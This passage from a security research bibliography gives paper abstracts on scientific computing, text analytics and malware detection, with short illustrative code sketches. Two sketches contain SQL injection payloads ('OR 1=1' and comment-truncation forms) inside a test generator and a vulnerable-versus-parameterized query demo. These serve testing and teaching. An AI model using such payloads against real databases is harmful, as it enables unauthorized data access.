system-specific threats, Threat modeling, Threat patterns
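
The Bozic and Wotawa entry above formalizes attack patterns as state machines from which test cases are generated and executed. As a rough illustration of that idea only (the states, payloads, and transitions below are invented, not the authors' UML model), a minimal Python sketch might walk such a machine and emit every payload sequence as a test case:

    # Hypothetical SQL-injection attack pattern encoded as a state machine.
    # Each transition names a next state and the payload it contributes.
    ATTACK_PATTERN = {
        "start":          [("inject_quote", "' OR '1'='1"), ("inject_comment", "admin'--")],
        "inject_quote":   [("observe", None)],
        "inject_comment": [("observe", None)],
        "observe":        [],   # terminal: the response would be checked here
    }

    def generate_tests(pattern, state="start", trace=()):
        """Walk the machine depth-first, yielding each payload sequence as a test case."""
        transitions = pattern[state]
        if not transitions:
            yield [p for p in trace if p is not None]
        for next_state, payload in transitions:
            yield from generate_tests(pattern, next_state, trace + (payload,))

    for test in generate_tests(ATTACK_PATTERN):
        print("test case:", test)   # in a real harness, sent to the system under test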
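
The Hamdi, Safran, and Hou entry above contrasts encryption at the application level with encryption inside the database (Transparent Data Encryption). Application-level encryption, the simpler of the two, looks roughly like the following sketch, which assumes the third-party Python cryptography package; the key handling and sample value are placeholders, not the paper's design:

    from cryptography.fernet import Fernet

    key = Fernet.generate_key()    # in practice: held in a key store, never beside the data
    f = Fernet(key)

    # Encrypt before INSERT, decrypt after SELECT; the database sees only ciphertext.
    ciphertext = f.encrypt(b"4111-1111-1111-1111")
    print(ciphertext)              # opaque token stored in the column
    print(f.decrypt(ciphertext))   # b'4111-1111-1111-1111'

Transparent Data Encryption, by contrast, performs the equivalent work below the SQL layer, so application code needs no such step.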
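
As background to the Pathan and Kindy entry above, the mechanics of a basic SQL injection, and the standard parameterized-query defense, fit in a few lines of Python's built-in sqlite3 module. The table and credentials are invented for illustration:

    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, pw TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'secret')")

    hostile = "' OR '1'='1"   # classic injection payload

    # Vulnerable: string concatenation lets the payload rewrite the WHERE clause.
    vulnerable = "SELECT * FROM users WHERE name = '%s'" % hostile
    print(conn.execute(vulnerable).fetchall())        # -> [('alice', 'secret')]

    # Safe: the driver binds the payload as data, so it matches nothing.
    safe = "SELECT * FROM users WHERE name = ?"
    print(conn.execute(safe, (hostile,)).fetchall())  # -> []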
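
The Marcozzi, Vanhoof, and Hainaut entry above generates test data by translating SQL semantics into SMT constraints. The fragment below is a drastically simplified taste of that workflow, using the Z3 solver's Python bindings (the z3-solver package) and an invented one-column predicate rather than the paper's relational encoding:

    from z3 import Int, Solver, And, sat

    age = Int("age")   # symbolic column value for a hypothetical row
    s = Solver()
    # Path condition for covering the branch "WHERE age >= 18 AND age < 65".
    s.add(And(age >= 18, age < 65))
    if s.check() == sat:
        print("adequate test datum: age =", s.model()[age])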

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Scientific Computing



Scientific computing is concerned with constructing mathematical models and quantitative analysis techniques and using computers to analyze and solve scientific problems. As a practical matter, scientific computing is the use of computer simulation and other forms of computation from numerical analysis and theoretical computer science to solve specific problems, including problems in cybersecurity. The articles presented here cover a range of approaches and applications, as well as theories.

  • Kumar, A.; Grupcev, V.; Yuan, Y.; Huang, J.; Tu, Y.; Shen, G., "Computing Spatial Distance Histograms for Large Scientific Datasets On-the-Fly," Knowledge and Data Engineering, IEEE Transactions on, vol. PP, no.99, pp.1,1, January 2014. (ID#:14-1772) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6702476&isnumber=4358933 This paper focuses on an important query in scientific simulation data analysis: the Spatial Distance Histogram (SDH). The computation time of an SDH query using the brute force method is quadratic. Often, such queries are executed continuously over certain time periods, increasing the computation time. We propose a highly efficient approximate algorithm to compute SDH over consecutive time periods with provable error bounds. The key idea of our algorithm is to derive the statistical distribution of distances from the spatial and temporal characteristics of particles. Upon organizing the data into a Quad-tree based structure, the spatiotemporal characteristics of particles in each node of the tree are acquired to determine the particles' spatial distribution as well as their temporal locality in consecutive time periods. We report our efforts in implementing and optimizing the above algorithm in Graphics Processing Units (GPUs) as a means to further improve the efficiency. The accuracy and efficiency of the proposed algorithm are backed by mathematical analysis and results of extensive experiments using data generated from real simulation studies. (A brute-force SDH baseline sketch appears after this list.) Keywords: (not provided)
  • Jacob, F.; Wynne, A.; Yan Liu; Gray, J., "Domain-Specific Languages for Developing and Deploying Signature Discovery Workflows," Computing in Science & Engineering , vol.16, no.1, pp.52,64, Jan.-Feb. 2014. (ID#:14-1773) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6654153&isnumber=6756717 Domain-agnostic signature discovery supports scientific investigation across domains through algorithm reuse. A new software tool defines two simple domain-specific languages that automate processes that support the reuse of existing algorithms in different workflow scenarios. The tool is demonstrated with a signature discovery workflow composed of services that wrap original scripts running high-performance computing tasks. Keywords: parallel processing; software reusability; software tools; specification languages; workflow management software; algorithm reuse; domain-agnostic signature discovery; domain-specific languages; high-performance computing tasks; scientific investigation; scripts; signature discovery workflow; software tool; workflow scenarios; Clustering algorithms; DSL; Domain specific languages; Scientific computing; Software algorithms; Web services; XML; DSL; Taverna; domain-specific languages; scientific computing; signature discovery; workflow
  • Humphrey, Alan; Meng, Qingyu; Berzins, Martin; de Oliveira, Diego Caminha B.; Rakamaric, Zvonimir; Gopalakrishnan, Ganesh, "Systematic Debugging Methods for Large-Scale HPC Computational Frameworks," Computing in Science & Engineering , vol.16, no.3, pp.48,56, May-June 2014. (ID#:14-1774) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6729885&isnumber=6834682 Parallel computational frameworks for high-performance computing are central to the advancement of simulation-based studies in science and engineering. Unfortunately, finding and fixing bugs in these frameworks can be extremely time consuming. Left unchecked, these bugs can drastically diminish the amount of new science that can be performed. This article presents a systematic study of the Uintah Computational Framework and approaches to debug it more incisively. A key insight is to leverage the modular structure of Uintah, which lends itself to systematic debugging. In particular, the authors have developed a new approach based on coalesced stack trace graphs (CSTG) that summarize the system behavior in terms of key control flows manifested through function invocation chains. They illustrate several scenarios for how CSTGs could help efficiently localize bugs, and present a case study of how they found and fixed a real Uintah bug using CSTGs. Keywords: Computational modeling; Computer bugs; Debugging; Runtime; Scientific computing; Software development; Systematics; computational modeling and frameworks; debugging aids; parallel programming; reliability; scientific computing
  • Di Pierro, M., "Portable Parallel Programs with Python and OpenCL," Computing in Science & Engineering , vol.16, no.1, pp.34,40, Jan.-Feb. 2014. (ID#:14-1775) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6655872&isnumber=6756717 Two Python modules are presented: pyOpenCL, a library that enables programmers to write Open Common Language (OpenCL) code within Python programs; and ocl, a Python-to-C converter that lets developers write OpenCL kernels using the Python syntax. Like CUDA, OpenCL is designed to run on multicore GPUs. OpenCL code can also run on other architectures, including ordinary CPUs and mobile devices, always taking advantage of their multicore capabilities. Combining Python, numerical Python (numPy), pyOpenCL, and ocl creates a powerful framework for developing efficient parallel programs that work on modern heterogeneous architectures. (A canonical pyOpenCL sketch appears after this list.) Keywords: high level languages; parallel architectures; parallel programming; CUDA; Open Common Language; Python syntax; Python-to-C converter; numPy; numerical Python; ocl; portable parallel program; pyOpenCL; Computer applications; Graphics processing units; Kernel; Multicore processing; Parallel processing; Programming; Scientific computing; GPU; OpenCL; Python; meta-programming; parallel programming; scientific computing
  • Gao, Shanzhen; Chen, Keh-Hsun, "Tackling Markoff-Hurwitz Equations," Computational Science and Computational Intelligence (CSCI), 2014 International Conference on , vol.1, no., pp.341,346, 10-13 March 2014. (ID#:14-1776) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6822132&isnumber=6822065 We present algorithms for searching and generating solutions to the equation x_1^2 + x_2^2 + ... + x_n^2 = k*x_1*x_2*...*x_n. Solutions are reported for n = 2, 3, ..., 9. Properties of solutions are discussed. We can prove that solutions do not exist when n = 4 and k = 2 or 3, and when n = 5 and k = 2 or 3. Conjectures based on computational results are discussed. (A brute-force search sketch appears after this list.) Keywords: Educational institutions; Equations; Indexes; Radio access networks; Scientific computing; Systematics; Time complexity; Markoff and Hurwitz equations; search solution space; solution generator; solution trees
  • Leeser, M.; Mukherjee, S.; Ramachandran, J.; Wahl, T., "Make it real: Effective floating-point reasoning via exact arithmetic," Design, Automation and Test in Europe Conference and Exhibition (DATE), 2014, vol., no., pp.1,4, 24-28 March 2014. (ID#:14-1777) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6800331&isnumber=6800201 Floating-point arithmetic is widely used in scientific computing. While many programmers are subliminally aware that floating-point numbers only approximate the reals, few are cognizant of the dangers this entails for programming. Such dangers range from tolerable rounding errors in sequential programs, to unexpected, divergent control flow in parallel code. To address these problems, we present a decision procedure for floating-point arithmetic (FPA) that exploits the proximity to real arithmetic (RA), via a loss-less reduction from FPA to RA. Our procedure does not involve any form of bit-blasting or bit-vectorization, and can thus generate much smaller back-end decision problems, albeit in a more complex logic. This tradeoff is beneficial for the exact and reliable analysis of parallel scientific software, which tends to give rise to large but benignly structured formulas. We have implemented a prototype decision engine and present encouraging results analyzing such software for numerical accuracy. (A two-line float-versus-exact demonstration appears after this list.) Keywords: floating point arithmetic; parallel programming; software tools; FPA; RA; back-end decision problems; bit blasting; bit vectorization; divergent control flow; floating point arithmetic; floating point reasoning; floating-point-to-real reduction; numerical accuracy; parallel code; parallel scientific software; prototype decision engine; real arithmetic; rounding errors; scientific computing; sequential programs; structured formulas; Abstracts; Cognition; Encoding; Equations; Floating-point arithmetic; Software; Standards
  • Al-Anzi, Fawaz S.; Salman, Ayed A.; Jacob, Noby K.; Soni, Jyoti, "Towards robust, scalable and secure network storage in Cloud Computing," Digital Information and Communication Technology and it's Applications (DICTAP), 2014 Fourth International Conference on , vol., no., pp.51,55, 6-8 May 2014. (ID#:14-1778) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6821656&isnumber=6821645 The term Cloud Computing is not something that appeared overnight; it may come from the time when computer systems remotely accessed applications and services. Cloud computing is a ubiquitous technology receiving huge attention in the scientific and industrial community. It is a ubiquitous, next-generation information technology architecture which offers on-demand access to the network: a dynamic, virtualized, scalable, pay-per-use model over the internet. In a cloud computing environment, a cloud service provider offers a "house of resources" that includes applications, data, runtime, middleware, operating system, virtualization, servers, data storage and sharing, and networking, and tries to take up most of the client's overhead. Cloud computing offers lots of benefits, but the journey to the cloud is not very easy. It has several pitfalls along the road because most of the services are outsourced to third parties, which adds risk. Cloud computing suffers from several issues, among the most significant of which are security, privacy, service availability, confidentiality, integrity, authentication, and compliance. Security is a shared responsibility of both client and service provider, and we believe security must be information-centric, adaptive, proactive and built in. Cloud computing and its security are emerging study areas. In this paper, we discuss data security in the cloud at the service provider end and propose a network storage architecture for data which ensures availability, reliability, scalability and security. Keywords: Availability; Cloud computing; Computer architecture; Data security; Distributed databases; Servers; Cloud Computing; Data Storage; Data security; RAID
  • Pfarr, F.; Buckel, T.; Winkelmann, A., "Cloud Computing Data Protection -- A Literature Review and Analysis," System Sciences (HICSS), 2014 47th Hawaii International Conference on , vol., no., pp.5018,5027, 6-9 Jan. 2014. (ID#:14-1779) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6759219&isnumber=6758592 Cloud Computing technologies are gaining increased attention both in academia and practice. Despite its relevance, its potential for more IT flexibility, and its beneficial effects on costs, legal uncertainties regarding data processing, especially between large economies, still exist on the customer and provider side. Against this background, this contribution aims at providing an overview of privacy issues and legal frameworks for data protection in Cloud environments discussed in recent scientific literature. Due to the overall complexity concerning international law, we decided to focus primarily on data traffic between the United States of America and the European Union. The result of our research revealed significant differences in the jurisdiction and consciousness for data protection in these two economies. As a consequence for further Cloud Computing research, we identify a large number of problems that need to be addressed. Keywords: cloud computing; data privacy; law; security of data; European Union; IT flexibility; United States of America; cloud computing; data processing; data protection; data traffic; international law; legal uncertainties; privacy issues; Cloud computing; Data privacy; Data processing; Europe; Law; Standards; Cloud Computing; Data Protection; Literature Review; Privacy
  • You-Wei Cheah (author) and Beth Plale (advisor), "Quality, Retrieval, and Analysis of Provenance in Large Scale Data," doctoral dissertation, Indiana University, 2014. (ID#:14-1780) Available at: http://dl.acm.org/citation.cfm?id=2604558&coll=DL&dl=GUIDE&CFID=496530737&CFTOKEN=65026387 With the popularity of 'Big Data' rising, this dissertation focuses on provenance (metadata describing the genealogy of a data product), whose role is prominent in the reuse and reproduction of scientific results, and addresses its quality, capture, and representation in large-scale settings. With a framework and method that identify the correctness, completeness, and relevance of data provenance, these dimensions can be analyzed at the node/edge, graph, and multi-graph levels. The dissertation also discusses the creation of a provenance database storing 48,000 provenance traces, including a failure model to address the varying types of failures that may occur. Keywords: (not provided)
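
The Kumar et al. entry above improves on the quadratic brute-force computation of the Spatial Distance Histogram. For orientation, that brute-force baseline (the cost their quad-tree algorithm avoids) is only a few lines of NumPy; the particle coordinates and bin layout below are synthetic:

    import numpy as np

    rng = np.random.default_rng(0)
    particles = rng.uniform(0.0, 10.0, size=(500, 3))    # synthetic 3-D positions

    # All pairwise distances: O(n^2) time and memory, the cost the paper avoids.
    diffs = particles[:, None, :] - particles[None, :, :]
    dists = np.sqrt((diffs ** 2).sum(axis=-1))
    iu = np.triu_indices(len(particles), k=1)            # count each pair once

    hist, edges = np.histogram(dists[iu], bins=9, range=(0.0, 18.0))
    print(list(zip(edges[:-1], hist)))                   # the spatial distance histogram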
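
The canonical pyOpenCL pattern described in the Di Pierro entry above (build a kernel from OpenCL source, move buffers to the device, run, copy back) is sketched below. It assumes the pyopencl and numpy packages and an available OpenCL platform:

    import numpy as np
    import pyopencl as cl

    ctx = cl.create_some_context()
    queue = cl.CommandQueue(ctx)

    a = np.random.rand(50000).astype(np.float32)
    b = np.random.rand(50000).astype(np.float32)
    mf = cl.mem_flags
    a_g = cl.Buffer(ctx, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf=a)
    b_g = cl.Buffer(ctx, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf=b)
    out_g = cl.Buffer(ctx, mf.WRITE_ONLY, a.nbytes)

    prg = cl.Program(ctx, """
    __kernel void add(__global const float *a, __global const float *b, __global float *out) {
        int gid = get_global_id(0);
        out[gid] = a[gid] + b[gid];
    }
    """).build()

    prg.add(queue, a.shape, None, a_g, b_g, out_g)   # one work-item per element
    out = np.empty_like(a)
    cl.enqueue_copy(queue, out, out_g)
    assert np.allclose(out, a + b)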
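
A tiny brute-force search makes the Gao and Chen equation above concrete. The bound is arbitrary and the code is only a naive enumerator, not the paper's generators:

    from itertools import product
    from math import prod

    def solutions(n, k, bound=10):
        """Positive solutions of x_1^2 + ... + x_n^2 = k*x_1*...*x_n up to a bound."""
        for xs in product(range(1, bound + 1), repeat=n):
            if sum(x * x for x in xs) == k * prod(xs):
                yield xs

    print(sorted(solutions(3, 3)))   # includes Markoff triples such as (1, 1, 1), (1, 1, 2), (1, 2, 5)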
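
The Leeser et al. entry above turns on the gap between floating-point and real arithmetic. The two comparisons below show the kind of discrepancy involved, using Python's exact fractions module as the "real" side; this illustrates the problem itself, not the paper's FPA-to-RA reduction:

    from fractions import Fraction

    # Binary floating point cannot represent 0.1, 0.2, or 0.3 exactly ...
    print(0.1 + 0.2 == 0.3)                                       # False
    # ... while exact rational arithmetic has no rounding at all.
    print(Fraction(1, 10) + Fraction(2, 10) == Fraction(3, 10))   # True
    # A branch such as "if x + y <= 0.3" can therefore diverge between the two models.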

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Text Analytics



Text analytics refers to linguistic, statistical, and machine learning techniques that model and structure the information content of textual sources for intelligence, exploratory data analysis, research, or investigation. The research cited here focuses on mining large volumes of text to identify insider threats, intrusions, and malware.

  • Heimerl, F.; Lohmann, S.; Lange, S.; Ertl, T., "Word Cloud Explorer: Text Analytics Based on Word Clouds," System Sciences (HICSS), 2014 47th Hawaii International Conference on , vol., no., pp.1833,1842, 6-9 Jan. 2014. (ID#:14-1448) Available at: http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6758829&ranges%3D2013_2014_p_Publication_Year%26queryText%3Dtext+analytics Word clouds have emerged as a straightforward and visually appealing visualization method for text. They are used in various contexts as a means to provide an overview by distilling text down to those words that appear with highest frequency. Typically, this is done in a static way as pure text summarization. We think, however, that there is a larger potential to this simple yet powerful visualization paradigm in text analytics. In this work, we explore the usefulness of word clouds for general text analysis tasks. We developed a prototypical system called the Word Cloud Explorer that relies entirely on word clouds as a visualization method. It equips them with advanced natural language processing, sophisticated interaction techniques, and context information. We show how this approach can be effectively used to solve text analysis tasks and evaluate it in a qualitative user study. (A word-frequency sketch appears after this list.) Keywords: data visualization; natural language processing; text analysis; context information; natural language processing; sophisticated interaction techniques; text analysis tasks; text analytics; text summarization; visualization method; visualization paradigm; word cloud explorer; word clouds; Context; Layout; Pragmatics; Tag clouds; Text analysis; User interfaces; Visualization; interaction; natural language processing; tag clouds; text analytics; visualization; word cloud explorer; word clouds
  • Atasu, K.; Polig, R.; Hagleitner, C.; Reiss, F.R., "Hardware-accelerated regular expression matching for high-throughput text analytics," Field Programmable Logic and Applications (FPL), 2013 23rd International Conference on , vol., no., pp.1,7, 2-4 Sept. 2013. (ID#:14-1449) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6645534&isnumber=6645482 Advanced text analytics systems combine regular expression (regex) matching, dictionary processing, and relational algebra for efficient information extraction from text documents. Such systems require support for advanced regex matching features, such as start offset reporting and capturing groups. However, existing regex matching architectures based on reconfigurable nondeterministic state machines and programmable deterministic state machines are not designed to support such features. We describe a novel architecture that supports such advanced features using a network of state machines. We also present a compiler that maps the regexs onto such networks that can be efficiently realized on reconfigurable logic. For each regex, our compiler produces a state machine description, statically computes the number of state machines needed, and produces an optimized interconnection network. Experiments on an Altera Stratix IV FPGA, using regexs from a real life text analytics benchmark, show that a throughput rate of 16 Gb/s can be reached. Keywords: field programmable gate arrays; finite state machines; knowledge acquisition; pattern matching; relational algebra; text analysis; Altera Stratix IV FPGA; bit rate 16 Gbit/s; capturing groups; compiler; dictionary processing; hardware-accelerated regular expression matching; high-throughput text analytics; information extraction; optimized interconnection network; programmable deterministic state machines; reconfigurable logic; reconfigurable nondeterministic state machines; regex matching architectures; relational algebra; start offset reporting; text documents; Delays; Dictionaries; Doped fiber amplifiers; Multiprocessor interconnection; Registers; Semantics
  • Polig, R.; Atasu, K.; Hagleitner, C., "Token-based dictionary pattern matching for text analytics," Field Programmable Logic and Applications (FPL), 2013 23rd International Conference on, vol., no., pp.1,6, 2-4 Sept. 2013. (ID#:14-1450) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6645535&isnumber=6645482 When performing queries for text analytics on unstructured text data, a large amount of the processing time is spent on regular expressions and dictionary matching. In this paper we present a compilable architecture for token-bound pattern matching with support for token pattern sequence detection. The architecture presented is capable of detecting several hundreds of dictionaries, each containing thousands of elements at high throughput. A programmable state machine is used as pattern detection engine to achieve deterministic performance while maintaining low storage requirements. For the detection of token sequences, a dedicated circuitry is compiled based on a non-deterministic automaton. A cascaded result lookup ensures efficient storage while allowing multi-token elements to be detected and multiple dictionary hits to be reported. We implemented on an Altera Stratix IV GX530, and were able to process up to 16 documents in parallel at a peak throughput rate of 9.7 Gb/s. Keywords: dictionaries; finite state machines; pattern matching; query processing; text analysis; Altera Stratix IV GX530; cascaded result lookup; compilable architecture; dedicated circuitry; deterministic performance; dictionary detection; dictionary matching; multitoken elements; nondeterministic automaton; pattern detection engine; programmable state machine; text analytics querying; token pattern sequence detection; token sequence detection; token-based dictionary pattern matching; unstructured text data; Automata; Computer architecture; Dictionaries; Doped fiber amplifiers; Engines; Pattern matching; Throughput
  • Dey, L.; Verma, I., "Text-Driven Multi-structured Data Analytics for Enterprise Intelligence," Web Intelligence (WI) and Intelligent Agent Technologies (IAT), 2013 IEEE/WIC/ACM International Joint Conferences on , vol.3, no., pp.213,220, 17-20 Nov. 2013. (ID#:14-1451) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6690731&isnumber=6690661 Text data constitutes the bulk of all enterprise data. Text repositories are not only tacit store-houses of knowledge about its people, projects and processes but also contain invaluable information about its customers, competitors, suppliers, partners and all other stakeholders. Mining this data can provide interesting and valuable insights provided it is appropriately integrated with other enterprise data. In this paper we propose a framework for text-driven analysis of multi-structured data. Keywords: business data processing; competitive intelligence; data analysis; data mining; text analysis; data mining; enterprise data; enterprise intelligence; text data; text driven analysis; text driven multistructured data analytics; text repositories; Business; Context; Media; Natural language processing; Semantics; Text mining; Information Fusion; Text Analytics
  • Agarwal, K.; Polig, R., "A high-speed and large-scale dictionary matching engine for Information Extraction systems," Application-Specific Systems, Architectures and Processors (ASAP), 2013 IEEE 24th International Conference on , vol., no., pp.59,66, 5-7 June 2013. (ID#:14-1452) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6567551&isnumber=6567524 Dictionary matching is a commonly used operation in Information Extraction (IE) systems. It involves matching a set of strings in a document against a dictionary of pre-defined patterns. In this paper, we describe a high performance and scalable hardware architecture to enable high throughput dictionary matching on very large dictionaries for text analytics applications. Our hardware accelerator employs a novel hashing based approach instead of commonly used deterministic finite automata (DFA) based algorithms. A limitation of the DFA based approaches is that they typically process one character every cycle, while the proposed hash based scheme can process a string token every cycle, thus achieving significantly higher processing throughput than the DFA based implementations. Our measurement results based on a prototype implementation on an Altera Stratix IV FPGA device indicate that our hardware dictionary matching engine can process typical document streams at a processing rate of ~1.5GB/s (~12 Gbps) while simultaneously allowing support for large dictionary sizes containing up to ~100K patterns, thus making it very useful for IE workload acceleration. Keywords: dictionaries; field programmable gate arrays; file organization; information retrieval systems; string matching; text analysis; Altera Stratix IV FPGA device; DFA based algorithms; IE systems; IE workload acceleration; deterministic finite automata based algorithms; hardware accelerator; hardware dictionary matching engine; hashing based approach; high throughput dictionary matching; high-speed dictionary matching engine; information extraction system; large-scale dictionary matching engine; scalable hardware architecture; string matching; string token; text analytics applications; Arrays; Dictionaries; Field programmable gate arrays; Hardware; Pattern matching; Random access memory; Throughput; FPGA; dictionary matching; hardware acceleration; hashing; information extraction; pattern matching; string matching; text analytics
  • Clemons, T.; Faisal, S.M.; Tatikonda, S.; Aggarwal, C.; Parthasarathy, S., "Hash in a flash: Hash tables for flash devices," Big Data, 2013 IEEE International Conference on , vol., no., pp.7,14, 6-9 Oct. 2013. (ID#:14-1453) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6691692&isnumber=6690588 Conservative estimates place the amount of data expected to be created by mankind this year to exceed several thousand exabytes. Given the enormous data deluge, and in spite of recent advances in main memory capacities, there is a clear and present need to move beyond algorithms that assume in-core (main-memory) computation. One fundamental task in Information Retrieval and text analytics requires the maintenance of local and global term frequencies from within large enterprise document corpora. This can be done with a counting hash-table; they associate keys to frequencies. In this paper, we will study the design landscape for the development of such an out-of-core counting hash table targeted at flash storage devices. Flash devices have clear benefits over traditional hard drives in terms of latency of access and energy efficiency. However, due to intricacies in their design, random writes can be relatively expensive and can degrade the life of the flash device. Counting hash tables are a challenging case for the flash drive because this data structure is inherently dependent upon the randomness of the hash function; frequency updates are random and may incur expensive random writes. We demonstrate how to overcome this challenge by designing a hash table with two related hash functions, one of which exhibits a data placement property with respect to the other. Specifically, we focus on three designs and evaluate the trade-offs among them along the axes of query performance, insert and update times, and I/O time using real-world data and an implementation of TF-IDF. (A counting hash table sketch appears after this list.) Keywords: data structures; flash memories; TF-IDF; data deluge; data placement property; data structure; energy efficiency; enterprise document corpora; flash storage devices; global term frequencies maintenance; in-core main-memory computation; information retrieval; local term frequencies maintenance; memory capacities; out-of-core counting hash table; query performance; text analytics; Flash; Context; Encyclopedias; Internet; Performance evaluation; Random access memory
  • Zhang, Yan; Ma, Hongtao; Xu, Yunfeng, "An Intelligence Gathering System for Business Based on Cloud Computing," Computational Intelligence and Design (ISCID), 2013 Sixth International Symposium on , vol.1, no., pp.201,204, 28-29 Oct. 2013. (ID#:14-1454) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6804970&isnumber=6804763 With the continued exponential growth in both complexity and volume of unstructured internet data, and enterprises become more automated, data driven and real-time, traditional business intelligence and analytics system meet new challenges. As with the Cloud Computing development, some parallel data analysis systems have been emerging. However, existing systems rarely have comprehensive function, either providing gathering service or data analysis service. Our project needs a comprehensive tool to store and analysis large scale data efficiently. In response to these challenges, a business intelligence gathering system based on Cloud computing is proposed. It supports parallel ETL process, text mining which are based on Hadoop. The demo achieves Chinese Word Segmentation, Bayesian classification algorithm and K-means algorithm in the MapReduce architecture to form the omni bearing and three-dimensional intelligence noumenon for enterprises. It can meet the needs on timeliness and pertinence of the information, or even can achieve real-time intelligence gathering and analytics. Keywords: MapReduce; classification; clustering; hadoop; intelligence gathering
  • Logasa Bogen, P.; Symons, C.T.; McKenzie, A.; Patton, R.M.; Gillen, R.E., "Massively scalable near duplicate detection in streams of documents using MDSH," Big Data, 2013 IEEE International Conference on , vol., no., pp.480,486, 6-9 Oct. 2013. (ID#:14-1455) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6691610&isnumber=6690588 In a world where large-scale text collections are not only becoming ubiquitous but also are growing at increasing rates, near duplicate documents are becoming a growing concern that has the potential to hinder many different information filtering tasks. While others have tried to address this problem, prior techniques have only been used on limited collection sizes and static cases. We will briefly describe the problem in the context of Open Source analysis along with our additional constraints for performance. In this work we propose two variations on Multi-dimensional Spectral Hash (MDSH) tailored for working on extremely large, growing sets of text documents. We analyze the memory and runtime characteristics of our techniques and provide an informal analysis of the quality of the near-duplicate clusters produced by our techniques. Keywords: file organization; information filtering; public domain software; text analysis; MDSH; document stream; information filtering task; large-scale text collections; memory characteristics; multidimensional spectral hash; near duplicate detection; near duplicate documents; near-duplicate clusters; open source analysis; quality informal analysis; runtime characteristics; text documents; Electronic publishing; Encyclopedias; Internet; Memory management; Random access memory; Runtime; Big Data; MDSH; Near Duplicate Detection; Open Source Intelligence; Streaming Text
  • Hung Son Nguyen, "Tolerance Rough Set Model and Its Applications in Web Intelligence," Web Intelligence (WI) and Intelligent Agent Technologies (IAT), 2013 IEEE/WIC/ACM International Joint Conferences on , vol.3, no., pp.237,244, 17-20 Nov. 2013. (ID#:14-1456) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6690734&isnumber=6690661 Tolerance Rough Set Model (TRSM) has been introduced as a tool for approximation of hidden concepts in text databases. In recent years, numerous successful applications of TRSM in web intelligence including text classification, clustering, thesaurus generation, semantic indexing, and semantic search, etc., have been proposed. This paper will review the fundamental concepts of TRSM, some of its possible extensions and some typical applications of TRSM in text mining. Moreover, the architecture of a semantic information retrieval system, called SONCA, will be presented to demonstrate the main idea as well as stimulate the further research on TRSM. Keywords: data mining; information retrieval systems; ontologies (artificial intelligence); rough set theory; text analysis; SONCA system; TRSM; Web intelligence; clustering; search based on ontologies and compound analytics; semantic indexing; semantic information retrieval system; semantic search; text classification; text databases; text mining; thesaurus generation; tolerance rough set model; Approximation methods; Indexes; Information retrieval; Ontologies; Semantics; Standards; Vectors; Tolerance rough set model; classification; clustering; semantic indexing; semantic search
  • Sundarkumar, G.G.; Ravi, V., "Malware detection by text and data mining," Computational Intelligence and Computing Research (ICCIC), 2013 IEEE International Conference on , vol., no., pp.1,6, 26-28 Dec. 2013. (ID#:14-1457) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6724229&isnumber=6724108 Cyber frauds are a major security threat to the banking industry worldwide. Malware is one of the manifestations of cyber frauds. Malware authors use Application Programming Interface (API) calls to perpetrate these crimes. In this paper, we propose a static analysis method to detect Malware based on API call sequences using text and data mining in tandem. We analyzed the dataset available at CSMINING group. First, we employed text mining to extract features from the dataset consisting a series of API calls. Further, mutual information is invoked for feature selection. Then, we resorted to over-sampling to balance the data set. Finally, we employed various data mining techniques such as Decision Tree (DT), Multi Layer Perceptron (MLP), Support Vector Machine (SVM), Probabilistic Neural Network (PNN) and Group Method for Data Handling (GMDH). We also applied One Class SVM (OCSVM). Throughout the paper, we used 10-fold cross validation technique for testing the techniques. We observed that SVM and OCSVM achieved 100% sensitivity after balancing the dataset. (A skeletal classification pipeline appears after this list.) Keywords: application program interfaces; data mining; decision trees; feature extraction; invasive software; neural nets; support vector machines; text analysis; API call sequences; DT; GMDH; MLP; Malware authors; OCSVM; PNN; SVM; application programming interface; cyber frauds; data mining; decision tree; feature extraction; feature selection; group method for data handling; malware detection; multi layer perceptron; one class SVM; probabilistic neural network; security threat; static analysis method; support vector machine; text mining; Accuracy; Feature extraction; Malware; Mutual information; Support vector machines; Text mining; Application Programming Interface calls; Data Mining; Mutual Information; Over Sampling; Text Mining
